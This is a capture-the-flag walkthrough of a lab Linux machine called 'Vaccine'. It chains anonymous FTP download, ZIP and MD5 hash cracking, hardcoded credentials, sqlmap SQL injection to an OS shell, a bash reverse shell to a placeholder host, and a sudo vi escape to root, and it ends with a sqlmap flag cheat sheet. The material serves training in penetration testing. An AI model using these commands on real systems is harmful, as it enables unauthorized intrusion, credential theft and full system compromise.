⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Vaccine is a multi-stage machine that starts with an FTP server containing a password-protected ZIP archive, cracks the archive with John the Ripper, uses the extracted credentials to access a web application, then exploits SQL injection with sqlmap to achieve a shell. Privilege escalation uses a misconfigured sudo rule. This machine ties together credential extraction, automated SQLi, and Linux privesc in a realistic chain.

Tools: nmap · ftp · zip2john · john · sqlmap · sudo  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
ZIP password cracking with zip2john + JohnPassword-protected archives are common in backup exfiltration scenarios
sqlmap for automated SQL injectionThe industry-standard automated SQLi tool — used when manual injection confirms vulnerability
sqlmap OS shell and file readEscalating from SQLi to OS command execution via sqlmap's built-in features
sudo -l for privilege escalationChecking what commands a user can run as root is the first privesc check on any Linux host
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed 22/tcp open ssh OpenSSH 8.0p1 80/tcp open http Apache httpd 2.4.41
03 — FTP: Extracting the Archive
Download the ZIP via anonymous FTP
ftp 10.129.x.x Name: anonymous ftp> ls backup.zip ftp> get backup.zip ftp> bye
Attempt to unzip — password protected
unzip backup.zip # Archive: backup.zip requires password
Extract the hash with zip2john
zip2john backup.zip > zip.hash
Crack with John the Ripper
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Output
741852963 (backup.zip)
Extract the archive
unzip backup.zip # Password: 741852963 # Extracts: index.php, style.css

Inspect index.php — the source code for the web application login. It contains hardcoded database credentials and the password hash for the admin account.

Credentials in index.php
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
// Admin hash in the login check: md5($_POST['password']) == "2cb42f8734ea607eefed3b70af13bbd3"
Crack the MD5 hash
echo "2cb42f8734ea607eefed3b70af13bbd3" | john --format=raw-md5 --stdin # or use hashcat: hashcat -m 0 hash.txt rockyou.txt # Result: qwerty789
04 — Web Application Login

Login to the web app at http://10.129.x.x/ with admin / qwerty789. The dashboard shows a car search feature with a URL parameter — a clear SQLi candidate.

Vulnerable URL pattern
http://10.129.x.x/dashboard.php?search=a
05 — SQL Injection with sqlmap

Confirm injection with sqlmap. Provide the authenticated session cookie so sqlmap can access the protected endpoint.

Run sqlmap with session cookie
sqlmap -u "http://10.129.x.x/dashboard.php?search=a" \ --cookie="PHPSESSID=YOUR_SESSION_ID" \ --os-shell

sqlmap detects the injection, identifies PostgreSQL as the backend, and drops into an os-shell. Upgrade immediately to a proper reverse shell.

From the sqlmap os-shell, launch a reverse shell
os-shell> bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
✓ Catch with nc -lvnp 4444. You now have a shell as the postgres user.
06 — sqlmap Reference
FlagWhat it does
-u URLTarget URL with injectable parameter
--cookieSession cookie for authenticated endpoints
--dbsEnumerate all databases
--tables -D dbList tables in a specific database
--dump -T table -D dbDump all rows from a table
--os-shellDrop into an interactive OS shell via SQLi
--file-read /etc/passwdRead a file from the server filesystem
--level=5 --risk=3Increase aggressiveness for harder targets
--batchSuppress prompts — use defaults automatically
--technique=URestrict to UNION-based injection only
07 — Privilege Escalation via sudo
Check sudo permissions
sudo -l User postgres may run the following commands: (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

The postgres user can run vi as root on a specific file. Since vi can spawn a shell from within itself, this is a clean privesc.

Open the file as root via sudo, then escape to shell in vi
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
Inside vi — escape to root shell
:set shell=/bin/bash :shell
# id uid=0(root) gid=0(root)
✓ Root shell. Read /root/flag.txt to complete the machine.
08 — Key Takeaways
sqlmap's --os-shell goes directly from SQL injection to command execution in a single step — but it leaves significant forensic traces. In a real engagement, manual exploitation is preferable for stealth.
ConceptReal-world relevance
Source code in backup archivesBackup ZIPs on FTP servers regularly contain hardcoded credentials and connection strings
MD5 for password storageMD5 is not a password hash — it's a checksum. Cracking MD5 passwords takes seconds with rockyou.txt
sqlmap --os-shellFastest path from SQLi to shell — but noisy. Manual UNION-based exploitation is more surgical
sudo -l is always step oneCheck sudo permissions immediately on every Linux shell — it's the most common privesc path in CTFs and real assessments
⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing